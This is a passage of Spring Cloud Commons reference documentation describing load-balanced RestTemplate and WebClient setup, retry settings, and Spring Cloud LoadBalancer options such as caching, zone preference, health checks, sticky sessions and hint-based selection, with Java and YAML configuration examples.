starter>> to your project.\nThen, `ReactiveLoadBalancer` is used underneath.\n\n==== Retrying Failed Requests\n\nA load-balanced `RestTemplate` can be configured to retry failed requests.\nBy default, this logic is disabled.\nFor the non-reactive version (with `RestTemplate`), you can enable it by adding link:https:\/\/github.com\/spring-projects\/spring-retry[Spring Retry] to your application's classpath. For the reactive version (with `WebTestClient), you need to set `spring.cloud.loadbalancer.retry.enabled=true`.\n\nIf you would like to disable the retry logic with Spring Retry or Reactive Retry on the classpath, you can set `spring.cloud.loadbalancer.retry.enabled=false`.\n\nFor the non-reactive implementation, if you would like to implement a `BackOffPolicy` in your retries, you need to create a bean of type `LoadBalancedRetryFactory` and override the `createBackOffPolicy()` method.\n\nFor the reactive implementation, you just need to enable it by setting `spring.cloud.loadbalancer.retry.backoff.enabled` to `false`.\n\nYou can set:\n\n- `spring.cloud.loadbalancer.retry.maxRetriesOnSameServiceInstance` - indicates how many times a request should be retried on the same `ServiceInstance` (counted separately for every selected instance)\n- `spring.cloud.loadbalancer.retry.maxRetriesOnNextServiceInstance` - indicates how many times a request should be retried a newly selected `ServiceInstance`\n- `spring.cloud.loadbalancer.retry.retryableStatusCodes` - the status codes on which to always retry a failed request.\n\nFor the reactive implementation, you can additionally set:\n - `spring.cloud.loadbalancer.retry.backoff.minBackoff` - Sets the minimum backoff duration (by default, 5 milliseconds)\n - `spring.cloud.loadbalancer.retry.backoff.maxBackoff` - Sets the maximum backoff duration (by default, max long value of milliseconds)\n - `spring.cloud.loadbalancer.retry.backoff.jitter` - Sets the jitter used for calculationg the actual backoff duration for each call (by default, 0.5).\n\nFor the reactive implementation, you can also implement your own `LoadBalancerRetryPolicy` to have more detailed control over the load-balanced call retries.\n\nNOTE: For load-balanced retries, by default, we wrap the `ServiceInstanceListSupplier` bean with `RetryAwareServiceInstanceListSupplier` to select a different instance from the one previously chosen, if available. You can disable this behavior by setting the value of `spring.cloud.loadbalancer.retry.avoidPreviousInstance` to `false`.\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n @Bean\n LoadBalancedRetryFactory retryFactory() {\n return new LoadBalancedRetryFactory() {\n @Override\n public BackOffPolicy createBackOffPolicy(String service) {\n \t\treturn new ExponentialBackOffPolicy();\n \t}\n };\n }\n}\n----\n====\n\nIf you want to add one or more `RetryListener` implementations to your retry functionality, you need to\ncreate a bean of type `LoadBalancedRetryListenerFactory` and return the `RetryListener` array\nyou would like to use for a given service, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n @Bean\n LoadBalancedRetryListenerFactory retryListenerFactory() {\n return new LoadBalancedRetryListenerFactory() {\n @Override\n public RetryListener[] createRetryListeners(String service) {\n return new RetryListener[]{new RetryListener() {\n @Override\n public <T, E extends Throwable> boolean open(RetryContext context, RetryCallback<T, E> callback) {\n \/\/TODO Do you business...\n return true;\n }\n\n @Override\n public <T, E extends Throwable> void close(RetryContext context, RetryCallback<T, E> callback, Throwable throwable) {\n \/\/TODO Do you business...\n }\n\n @Override\n public <T, E extends Throwable> void onError(RetryContext context, RetryCallback<T, E> callback, Throwable throwable) {\n \/\/TODO Do you business...\n }\n }};\n }\n };\n }\n}\n----\n====\n\n=== Multiple `RestTemplate` Objects\n\nIf you want a `RestTemplate` that is not load-balanced, create a `RestTemplate` bean and inject it.\nTo access the load-balanced `RestTemplate`, use the `@LoadBalanced` qualifier when you create your `@Bean`, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n RestTemplate loadBalanced() {\n return new RestTemplate();\n }\n\n @Primary\n @Bean\n RestTemplate restTemplate() {\n return new RestTemplate();\n }\n}\n\npublic class MyClass {\n@Autowired\nprivate RestTemplate restTemplate;\n\n @Autowired\n @LoadBalanced\n private RestTemplate loadBalanced;\n\n public String doOtherStuff() {\n return loadBalanced.getForObject(\"http:\/\/stores\/stores\", String.class);\n }\n\n public String doStuff() {\n return restTemplate.getForObject(\"http:\/\/example.com\", String.class);\n }\n}\n----\n====\n\nIMPORTANT: Notice the use of the `@Primary` annotation on the plain `RestTemplate` declaration in the preceding example to disambiguate the unqualified `@Autowired` injection.\n\nTIP: If you see errors such as `java.lang.IllegalArgumentException: Can not set org.springframework.web.client.RestTemplate field com.my.app.Foo.restTemplate to com.sun.proxy.$Proxy89`, try injecting `RestOperations` or setting `spring.aop.proxyTargetClass=true`.\n\n=== Multiple WebClient Objects\n\nIf you want a `WebClient` that is not load-balanced, create a `WebClient` bean and inject it.\nTo access the load-balanced `WebClient`, use the `@LoadBalanced` qualifier when you create your `@Bean`, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n WebClient.Builder loadBalanced() {\n return WebClient.builder();\n }\n\n @Primary\n @Bean\n WebClient.Builder webClient() {\n return WebClient.builder();\n }\n}\n\npublic class MyClass {\n @Autowired\n private WebClient.Builder webClientBuilder;\n\n @Autowired\n @LoadBalanced\n private WebClient.Builder loadBalanced;\n\n public Mono<String> doOtherStuff() {\n return loadBalanced.build().get().uri(\"http:\/\/stores\/stores\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n\n public Mono<String> doStuff() {\n return webClientBuilder.build().get().uri(\"http:\/\/example.com\")\n \t\t\t\t.retrieve().bodyToMono(String.class);\n }\n}\n----\n====\n\n[[loadbalanced-webclient]]\n=== Spring WebFlux `WebClient` as a Load Balancer Client\n\nThe Spring WebFlux can work with both reactive and non-reactive `WebClient` configurations, as the topics describe:\n\n* <<webflux-with-reactive-loadbalancer>>\n* <<load-balancer-exchange-filter-functionload-balancer-exchange-filter-function>>\n\n[[webflux-with-reactive-loadbalancer]]\n==== Spring WebFlux `WebClient` with `ReactorLoadBalancerExchangeFilterFunction`\n\nYou can configure `WebClient` to use the `ReactiveLoadBalancer`.\nIf you add <<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project\nand if `spring-webflux` is on the classpath, `ReactorLoadBalancerExchangeFilterFunction` is auto-configured.\nThe following example shows how to configure a `WebClient` to use reactive load-balancer:\n\n====\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private ReactorLoadBalancerExchangeFilterFunction lbFunction;\n\n public Mono<String> doOtherStuff() {\n return WebClient.builder().baseUrl(\"http:\/\/stores\")\n .filter(lbFunction)\n .build()\n .get()\n .uri(\"\/stores\")\n .retrieve()\n .bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `ReactorLoadBalancer` is used to create a full physical address.\n\n[[load-balancer-exchange-filter-function]]\n==== Spring WebFlux `WebClient` with a Non-reactive Load Balancer Client\n\nIf `spring-webflux` is on the classpath, `LoadBalancerExchangeFilterFunction`\nis auto-configured. Note, however, that this\nuses a non-reactive client under the hood.\nThe following example shows how to configure a `WebClient` to use load-balancer:\n\n====\n[source,java,indent=0]\n----\npublic class MyClass {\n @Autowired\n private LoadBalancerExchangeFilterFunction lbFunction;\n\n public Mono<String> doOtherStuff() {\n return WebClient.builder().baseUrl(\"http:\/\/stores\")\n .filter(lbFunction)\n .build()\n .get()\n .uri(\"\/stores\")\n .retrieve()\n .bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `LoadBalancerClient` is used to create a full physical address.\n\nWARN: This approach is now deprecated.\nWe suggest that you use <<webflux-with-reactive-loadbalancer,WebFlux with reactive Load-Balancer>>\ninstead.\n\n[[ignore-network-interfaces]]\n=== Ignore Network Interfaces\n\nSometimes, it is useful to ignore certain named network interfaces so that they can be excluded from Service Discovery registration (for example, when running in a Docker container).\nA list of regular expressions can be set to cause the desired network interfaces to be ignored.\nThe following configuration ignores the `docker0` interface and all interfaces that start with `veth`:\n\n.application.yml\n====\n----\nspring:\n cloud:\n inetutils:\n ignoredInterfaces:\n - docker0\n - veth.*\n----\n====\n\nYou can also force the use of only specified network addresses by using a list of regular expressions, as the following example shows:\n\n.bootstrap.yml\n====\n----\nspring:\n cloud:\n inetutils:\n preferredNetworks:\n - 192.168\n - 10.0\n----\n====\n\nYou can also force the use of only site-local addresses, as the following example shows:\n\n.application.yml\n====\n----\nspring:\n cloud:\n inetutils:\n useOnlySiteLocalInterfaces: true\n----\n====\n\nSee https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/net\/Inet4Address.html#isSiteLocalAddress--[Inet4Address.html.isSiteLocalAddress()] for more details about what constitutes a site-local address.\n\n[[http-clients]]\n=== HTTP Client Factories\n\nSpring Cloud Commons provides beans for creating both Apache HTTP clients (`ApacheHttpClientFactory`) and OK HTTP clients (`OkHttpClientFactory`).\nThe `OkHttpClientFactory` bean is created only if the OK HTTP jar is on the classpath.\nIn addition, Spring Cloud Commons provides beans for creating the connection managers used by both clients: `ApacheHttpClientConnectionManagerFactory` for the Apache HTTP client and `OkHttpClientConnectionPoolFactory` for the OK HTTP client.\nIf you would like to customize how the HTTP clients are created in downstream projects, you can provide your own implementation of these beans.\nIn addition, if you provide a bean of type `HttpClientBuilder` or `OkHttpClient.Builder`, the default factories use these builders as the basis for the builders returned to downstream projects.\nYou can also disable the creation of these beans by setting `spring.cloud.httpclientfactories.apache.enabled` or `spring.cloud.httpclientfactories.ok.enabled` to `false`.\n\n[[enabled-features]]\n=== Enabled Features\n\nSpring Cloud Commons provides a `\/features` actuator endpoint.\nThis endpoint returns features available on the classpath and whether they are enabled.\nThe information returned includes the feature type, name, version, and vendor.\n\n==== Feature types\n\nThere are two types of 'features': abstract and named.\n\nAbstract features are features where an interface or abstract class is defined and that an implementation the creates, such as `DiscoveryClient`, `LoadBalancerClient`, or `LockService`.\nThe abstract class or interface is used to find a bean of that type in the context.\nThe version displayed is `bean.getClass().getPackage().getImplementationVersion()`.\n\nNamed features are features that do not have a particular class they implement. These features include \"`Circuit Breaker`\", \"`API Gateway`\", \"`Spring Cloud Bus`\", and others. These features require a name and a bean type.\n\n==== Declaring features\n\nAny module can declare any number of `HasFeature` beans, as the following examples show:\n\n====\n[source,java,indent=0]\n----\n@Bean\npublic HasFeatures commonsFeatures() {\n return HasFeatures.abstractFeatures(DiscoveryClient.class, LoadBalancerClient.class);\n}\n\n@Bean\npublic HasFeatures consulFeatures() {\n return HasFeatures.namedFeatures(\n new NamedFeature(\"Spring Cloud Bus\", ConsulBusAutoConfiguration.class),\n new NamedFeature(\"Circuit Breaker\", HystrixCommandAspect.class));\n}\n\n@Bean\nHasFeatures localFeatures() {\n return HasFeatures.builder()\n .abstractFeature(Something.class)\n .namedFeature(new NamedFeature(\"Some Other Feature\", Someother.class))\n .abstractFeature(Somethingelse.class)\n .build();\n}\n----\n====\n\nEach of these beans should go in an appropriately guarded `@Configuration`.\n\n\n=== Spring Cloud Compatibility Verification\n\nDue to the fact that some users have problem with setting up Spring Cloud application, we've decided\nto add a compatibility verification mechanism. It will break if your current setup is not compatible\nwith Spring Cloud requirements, together with a report, showing what exactly went wrong.\n\nAt the moment we verify which version of Spring Boot is added to your classpath.\n\nExample of a report\n\n====\n----\n***************************\nAPPLICATION FAILED TO START\n***************************\n\nDescription:\n\nYour project setup is incompatible with our requirements due to following reasons:\n\n- Spring Boot [2.1.0.RELEASE] is not compatible with this Spring Cloud release train\n\n\nAction:\n\nConsider applying the following actions:\n\n- Change Spring Boot version to one of the following versions [1.2.x, 1.3.x] .\nYou can find the latest Spring Boot versions here [https:\/\/spring.io\/projects\/spring-boot#learn].\nIf you want to learn more about the Spring Cloud Release train compatibility, you can visit this page [https:\/\/spring.io\/projects\/spring-cloud#overview] and check the [Release Trains] section.\n----\n====\n\nIn order to disable this feature, set `spring.cloud.compatibility-verifier.enabled` to `false`.\nIf you want to override the compatible Spring Boot versions, just set the\n`spring.cloud.compatibility-verifier.compatible-boot-versions` property with a comma separated list\nof compatible Spring Boot versions.\n\n== Spring Cloud LoadBalancer\n\nSpring Cloud provides its own client-side load-balancer abstraction and implementation. For the load-balancing\nmechanism, `ReactiveLoadBalancer` interface has been added and a *Round-Robin-based* and *Random* implementations\nhave been provided for it. In order to get instances to select from reactive `ServiceInstanceListSupplier`\nis used. Currently we support a service-discovery-based implementation of `ServiceInstanceListSupplier`\nthat retrieves available instances from Service Discovery using a <<discovery-client, Discovery Client>> available in the classpath.\n\nTIP: It is possible to disable Spring Cloud LoadBalancer by setting the value of `spring.cloud.loadbalancer.enabled` to `false`.\n\n=== Switching between the load-balancing algorithms\n\nThe `ReactiveLoadBalancer` implementation that is used by default is `RoundRobinLoadBalancer`. To switch to a different implementation, either for selected services or all of them, you can use the <<custom-loadbalancer-configuration, custom LoadBalancer configurations mechanism>>.\n\nFor example, the following configuration can be passed via `@LoadBalancerClient` annotation to switch to using the `RandomLoadBalancer`:\n\n[[random-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tReactorLoadBalancer<ServiceInstance> randomLoadBalancer(Environment environment,\n\t\t\tLoadBalancerClientFactory loadBalancerClientFactory) {\n\t\tString name = environment.getProperty(LoadBalancerClientFactory.PROPERTY_NAME);\n\t\treturn new RandomLoadBalancer(loadBalancerClientFactory\n\t\t\t\t.getLazyProvider(name, ServiceInstanceListSupplier.class),\n\t\t\t\tname);\n\t}\n}\n----\n\nNOTE: The classes you pass as `@LoadBalancerClient` or `@LoadBalancerClients` configuration arguments should either not be annotated with `@Configuration` or be outside component scan scope.\n\n=== Spring Cloud LoadBalancer integrations\n\nIn order to make it easy to use Spring Cloud LoadBalancer, we provide `ReactorLoadBalancerExchangeFilterFunction` that can be used with `WebClient` and `BlockingLoadBalancerClient` that works with `RestTemplate`.\nYou can see more information and examples of usage in the following sections:\n\n* <<rest-template-loadbalancer-client,Spring RestTemplate as a Load Balancer Client>>\n* <<webclinet-loadbalancer-client, Spring WebClient as a Load Balancer Client>>\n* <<webflux-with-reactive-loadbalancer,Spring WebFlux WebClient with `ReactorLoadBalancerExchangeFilterFunction`>>\n\n[[loadbalancer-caching]]\n=== Spring Cloud LoadBalancer Caching\n\nApart from the basic `ServiceInstanceListSupplier` implementation that retrieves instances via `DiscoveryClient` each time it has to choose an instance, we provide two caching implementations.\n\n==== https:\/\/github.com\/ben-manes\/caffeine[Caffeine]-backed LoadBalancer Cache Implementation\n\nIf you have `com.github.ben-manes.caffeine:caffeine` in the classpath, Caffeine-based implementation will be used.\nSee the <<loadbalancer-cache-configuration, LoadBalancerCacheConfiguration>> section for information on how to configure it.\n\nIf you are using Caffeine, you can also override the default Caffeine Cache setup for the LoadBalancer by passing your own https:\/\/static.javadoc.io\/com.github.ben-manes.caffeine\/caffeine\/2.2.2\/com\/github\/benmanes\/caffeine\/cache\/CaffeineSpec.html[Caffeine Specification]\nin the `spring.cloud.loadbalancer.cache.caffeine.spec` property.\n\nWARN: Passing your own Caffeine specification will override any other LoadBalancerCache settings, including <<loadbalancer-cache-configuration, General LoadBalancer Cache Configuration>> fields, such as `ttl` and `capacity`.\n\n==== Default LoadBalancer Cache Implementation\n\nIf you do not have Caffeine in the classpath, the `DefaultLoadBalancerCache`, which comes automatically with `spring-cloud-starter-loadbalancer`, will be used.\nSee the <<loadbalancer-cache-configuration, LoadBalancerCacheConfiguration>> section for information on how to configure it.\n\nTIP: To use Caffeine instead of the default cache, add the `com.github.ben-manes.caffeine:caffeine` dependency to classpath.\n\n[[loadbalancer-cache-configuration]]\n==== LoadBalancer Cache Configuration\n\nYou can set your own `ttl` value (the time after write after which entries should be expired), expressed as `Duration`, by passing a `String` compliant with the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/spring-boot-features.html#boot-features-external-config-conversion-duration[Spring Boot `String` to `Duration` converter syntax].\nas the value of the `spring.cloud.loadbalancer.cache.ttl` property.\nYou can also set your own LoadBalancer cache initial capacity by setting the value of the `spring.cloud.loadbalancer.cache.capacity` property.\n\nThe default setup includes `ttl` set to 35 seconds and the default `initialCapacity` is `256`.\n\nYou can also altogether disable loadBalancer caching by setting the value of `spring.cloud.loadbalancer.cache.enabled`\nto `false`.\n\nWARNING: Although the basic, non-cached, implementation is useful for prototyping and testing, it's much less efficient than the cached versions, so we recommend always using the cached version in production. If the caching is already done by the `DiscoveryClient` implementation, for example `EurekaDiscoveryClient`, the load-balancer caching should be disabled to prevent double caching.\n\n=== Zone-Based Load-Balancing\n\nTo enable zone-based load-balancing, we provide the `ZonePreferenceServiceInstanceListSupplier`.\nWe use `DiscoveryClient`-specific `zone` configuration (for example, `eureka.instance.metadata-map.zone`) to pick the zone that the client tries to filter available service instances for.\n\nNOTE: You can also override `DiscoveryClient`-specific zone setup by setting the value of `spring.cloud.loadbalancer.zone` property.\n\nWARNING: For the time being, only Eureka Discovery Client is instrumented to set the LoadBalancer zone. For other discovery client, set the `spring.cloud.loadbalancer.zone` property. More instrumentations coming shortly.\n\nNOTE: To determine the zone of a retrieved `ServiceInstance`, we check the value under the `\"zone\"` key in its metadata map.\n\nThe `ZonePreferenceServiceInstanceListSupplier` filters retrieved instances and only returns the ones within the same zone.\nIf the zone is `null` or there are no instances within the same zone, it returns all the retrieved instances.\n\nIn order to use the zone-based load-balancing approach, you will have to instantiate a `ZonePreferenceServiceInstanceListSupplier` bean in a <<custom-loadbalancer-configuration,custom configuration>>.\n\nWe use delegates to work with `ServiceInstanceListSupplier` beans.\nWe suggest passing a `DiscoveryClientServiceInstanceListSupplier` delegate in the constructor of `ZonePreferenceServiceInstanceListSupplier` and, in turn, wrapping the latter with a `CachingServiceInstanceListSupplier` to leverage <<loadbalancer-caching, LoadBalancer caching mechanism>>.\n\nYou could use this sample configuration to set it up:\n\n[[zoned-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withZonePreference()\n\t\t\t\t\t.withCaching()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\n=== Instance Health-Check for LoadBalancer\n\nIt is possible to enable a scheduled HealthCheck for the LoadBalancer. The `HealthCheckServiceInstanceListSupplier`\nis provided for that. It regularly verifies if the instances provided by a delegate\n`ServiceInstanceListSupplier` are still alive and only returns the healthy instances,\nunless there are none - then it returns all the retrieved instances.\n\nTIP: This mechanism is particularly helpful while using the `SimpleDiscoveryClient`. For the\nclients backed by an actual Service Registry, it's not necessary to use, as we already get\nhealthy instances after querying the external ServiceDiscovery.\n\nTIP: This supplier is also recommended for setups with a small number of instances per service\nin order to avoid retrying calls on a failing instance.\n\nWARNING: If using any of the Service Discovery-backed suppliers, adding this health-check mechanism is usually not necessary, as we retrieve the health state of the instances directly\nfrom the Service Registry.\n\nTIP: The `HealthCheckServiceInstanceListSupplier` relies on having updated instances provided by a delegate flux. In the rare cases when you want to use a delegate that does not refresh the instances, even though the list of instances may change (such as the `ReactiveDiscoveryClientServiceInstanceListSupplier` provided by us), you can set `spring.cloud.loadbalancer.health-check.refetch-instances` to `true` to have the instance list refreshed by the `HealthCheckServiceInstanceListSupplier`. You can then also adjust the refretch intervals by modifying the value of `spring.cloud.loadbalancer.health-check.refetch-instances-interval` and opt to disable the additional healthcheck repetitions by setting `spring.cloud.loadbalancer.health-check.repeat-health-check` to `false` as every instances refetch\n will also trigger a healthcheck.\n\n`HealthCheckServiceInstanceListSupplier` uses properties prefixed with\n`spring.cloud.loadbalancer.health-check`. You can set the `initialDelay` and `interval`\nfor the scheduler. You can set the default path for the healthcheck URL by setting\nthe value of the `spring.cloud.loadbalancer.health-check.path.default` property. You can also set a specific value for any given service by setting the value of the `spring.cloud.loadbalancer.health-check.path.[SERVICE_ID]` property, substituting `[SERVICE_ID]` with the correct ID of your service. If the path is not set, `\/actuator\/health` is used by default.\n\nTIP: If you rely on the default path (`\/actuator\/health`), make sure you add `spring-boot-starter-actuator` to your collaborator's dependencies, unless you are planning to add such an endpoint on your own.\n\nIn order to use the health-check scheduler approach, you will have to instantiate a `HealthCheckServiceInstanceListSupplier` bean in a <<custom-loadbalancer-configuration,custom configuration>>.\n\nWe use delegates to work with `ServiceInstanceListSupplier` beans.\nWe suggest passing a `DiscoveryClientServiceInstanceListSupplier` delegate in the constructor of `HealthCheckServiceInstanceListSupplier`.\n\nYou could use this sample configuration to set it up:\n\n[[health-check-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withHealthChecks()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nTIP: For the non-reactive stack, create this supplier with the `withBlockingHealthChecks()`.\nYou can also pass your own `WebClient` or `RestTemplate` instance to be used for the checks.\n\nWARNING: `HealthCheckServiceInstanceListSupplier` has its own caching mechanism based on Reactor Flux `replay()`. Therefore, if it's being used, you may want to skip wrapping that supplier with `CachingServiceInstanceListSupplier`.\n\n=== Same instance preference for LoadBalancer\n\nYou can set up the LoadBalancer in such a way that it prefers the instance that was previously selected, if that instance is available.\n\nFor that, you need to use `SameInstancePreferenceServiceInstanceListSupplier`. You can configure it either by setting the value of `spring.cloud.loadbalancer.configurations` to `same-instance-preference` or by providing your own `ServiceInstanceListSupplier` bean -- for example:\n\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withSameInstancePreference()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nTIP: This is also a replacement for Zookeeper `StickyRule`.\n\n=== Request-based Sticky Session for LoadBalancer\n\nYou can set up the LoadBalancer in such a way that it prefers the instance with `instanceId` provided in a request cookie. We currently support this if the request is being passed to the LoadBalancer through either `ClientRequestContext` or `ServerHttpRequestContext`, which are used by the SC LoadBalancer exchange filter functions and filters.\n\nFor that, you need to use the `RequestBasedStickySessionServiceInstanceListSupplier`. You can configure it either by setting the value of `spring.cloud.loadbalancer.configurations` to `request-based-sticky-session` or by providing your own `ServiceInstanceListSupplier` bean -- for example:\n\n[[health-check-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withRequestBasedStickySession()\n\t\t\t\t\t.build(context);\n\t }\n\t}\n----\n\nFor that functionality, it is useful to have the selected service instance (which can be different from the one in the original request cookie if that one is not available) to be updated before sending the request forward. To do that, set the value of `spring.cloud.loadbalancer.sticky-session.add-service-instance-cookie` to `true`.\n\nBy default, the name of the cookie is `sc-lb-instance-id`. You can modify it by changing the value of the `spring.cloud.loadbalancer.instance-id-cookie-name` property.\n\nNOTE: This feature is currently supported for WebClient-backed load-balancing.\n\n[[spring-cloud-loadbalancer-hints]]\n=== Spring Cloud LoadBalancer Hints\n\nSpring Cloud LoadBalancer lets you set `String` hints that are passed to the LoadBalancer within the `Request` object and that can later be used in `ReactiveLoadBalancer` implementations that can handle them.\n\nYou can set a default hint for all services by setting the value of the `spring.cloud.loadbalancer.hint.default` property. You can also set a specific value\nfor any given service by setting the value of the `spring.cloud.loadbalancer.hint.[SERVICE_ID]` property, substituting `[SERVICE_ID]` with the correct ID of your service. If the hint is not set by the user, `default` is used.\n\n[[hints-based-loadbalancing]]\n=== Hint-Based Load-Balancing\n\nWe also provide a `HintBasedServiceInstanceListSupplier`, which is a `ServiceInstanceListSupplier` implementation for hint-based instance selection.\n\n`HintBasedServiceInstanceListSupplier` checks for a hint request header (the default header-name is `X-SC-LB-Hint`, but you can modify it by changing the value of the `spring.cloud.loadbalancer.hint-header-name` property) and, if it finds a hint request header, uses the hint value passed in the header to filter service instances.\n\nIf no hint header has been added, `HintBasedServiceInstanceListSupplier` uses <<spring-cloud-loadbalancer-hints,hint values from properties>> to filter service instances.\n\nIf no hint is set, either by the header or by properties, all service instances provided by the delegate are returned.\n\nWhile filtering, `HintBasedServiceInstanceListSupplier` looks for service instances that have a matching value set under the `hint` key in their `metadataMap`. If no matching instances are found, all instances provided by the delegate are returned.\n\nYou could use the following sample configuration to set it up:\n\n[[hints-based-custom-loadbalancer-configuration]]\n[source,java,indent=0]\n----\npublic class CustomLoadBalancerConfiguration {\n\n\t@Bean\n\tpublic ServiceInstanceListSupplier discoveryClientServiceInstanceListSupplier(\n\t\t\tConfigurableApplicationContext context) {\n\t\treturn ServiceInstanceListSupplier.builder()\n\t\t\t\t\t.withDiscoveryClient()\n\t\t\t\t\t.withHints()\n\t\t\t\t\t.withCaching()\n\t\t\t\t\t.build(context);\n\t}\n}\n----\n\n=== Transform the load-balanced HTTP request\n\nYou can use the selected `ServiceInstance` to transform the load-balanced HTTP Request.\n\nFor `RestTemplate`, you need to implement and define `LoadBalancerRequestTransformer` as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LoadBalancerRequestTransformer transformer() {\n\t\treturn new LoadBalancerRequestTransformer() {\n\t\t\t@Override\n\t\t\tpublic HttpRequest transformRequest(HttpRequest request, ServiceInstance instance) {\n\t\t\t\treturn new HttpRequestWrapper(request) {\n\t\t\t\t\t@Override\n\t\t\t\t\tpublic HttpHeaders getHeaders() {\n\t\t\t\t\t\tHttpHeaders headers = new HttpHeaders();\n\t\t\t\t\t\theaders.putAll(super.getHeaders());\n\t\t\t\t\t\theaders.add(\"X-InstanceId\", instance.getInstanceId());\n\t\t\t\t\t\treturn headers;\n\t\t\t\t\t}\n\t\t\t\t};\n\t\t\t}\n\t\t};\n\t}\n----\n\nFor `WebClient`, you need to implement and define `LoadBalancerClientRequestTransformer` as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic LoadBalancerClientRequestTransformer transformer() {\n\t\treturn new LoadBalancerClientRequestTransformer() {\n\t\t\t@Override\n\t\t\tpublic ClientRequest transformRequest(ClientRequest request, ServiceInstance instance) {\n\t\t\t\treturn ClientRequest.from(request)\n\t\t\t\t\t\t.header(\"X-InstanceId\", instance.getInstanceId())\n\t\t\t\t\t\t.build();\n\t\t\t}\n\t\t};\n\t}\n----\n\nIf multiple transformers are defined, they are applied in the order in which Beans are defined.\nAlternatively, you can use `LoadBalancerRequestTransformer.DEFAULT_ORDER` or `LoadBalancerClientRequestTransformer.DEFAULT_ORDER` to specify the order.\n\n[[spring-cloud-loadbalancer-starter]]\n=== Spring Cloud LoadBalancer Starter\n\nWe also provide a starter that allows you to easily add Spring Cloud LoadBalancer in a Spring Boot app.\nIn order to use it, just add `org.springframework.cloud:spring-cloud-starter-loadbalancer` to your Spring Cloud dependencies in your build file.\n\nNOTE: Spring Cloud LoadBalancer starter includes\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-caching.html[Spring Boot Caching]\nand https:\/\/github.com\/stoyanr\/Evictor[Evictor].\n\n[[custom-loadbalancer-configuration]]\n=== Passing Your Own Spring Cloud LoadBalancer Configuration\n\nYou can also use the `@LoadBalancerClient` annotation to pass your own load-balancer client configuration, passing the name of the load-balancer client and the configuration class, as follows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@LoadBalancerClient(value = \"stores\", configuration = CustomLoadBalancerConfiguration.class)\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n----\n\nTIP:: In order to make working on your own LoadBalancer configuration easier, we have added a `builder()` method to the `ServiceInstanceListSupplier` class.\n\nTIP:: You can also use our alternative predefined configurations in place of the default ones by setting the value of `spring.cloud.loadbalancer.configurations` property to `zone-preference` to use `ZonePreferenceServiceInstanceListSupplier` with caching or to `health-check` to use `HealthCheckServiceInstanceListSupplier` with caching.\n====\n\nYou can use this feature to instantiate different implementations of `ServiceInstanceListSupplier` or `ReactorLoadBalancer`, either written by you, or provided by us as alternatives (for example `ZonePreferenceServiceInstanceListSupplier`) to override the default setup.\n\nYou can see an example of a custom configuration <<zoned-based-custom-loadbalancer-configuration,here>>.\n\nNOTE: The annotation `value` arguments (`stores` in the example above) specifies the service id of the service that we should send the requests to with the given custom configuration.\n\nYou can also pass multiple configurations (for more than one load-balancer client) through the `@LoadBalancerClients` annotation, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@LoadBalancerClients({@LoadBalancerClient(value = \"stores\", configuration = StoresLoadBalancerClientConfiguration.class), @LoadBalancerClient(value = \"customers\", configuration = CustomersLoadBalancerClientConfiguration.class)})\npublic class MyConfiguration {\n\n\t@Bean\n\t@LoadBalanced\n\tpublic WebClient.Builder loadBalancedWebClientBuilder() {\n\t\treturn WebClient.builder();\n\t}\n}\n----\n\nNOTE: The classes you pass as `@LoadBalancerClient` or `@LoadBalancerClients` configuration arguments should either not be annotated with `@Configuration` or be outside component scan scope.\n\n====\n\n[[loadbalancer-lifecycle]]\n=== Spring Cloud LoadBalancer Lifecycle\n\nOne type of bean that it may be useful to register using <<custom-loadbalancer-configuration,Custom 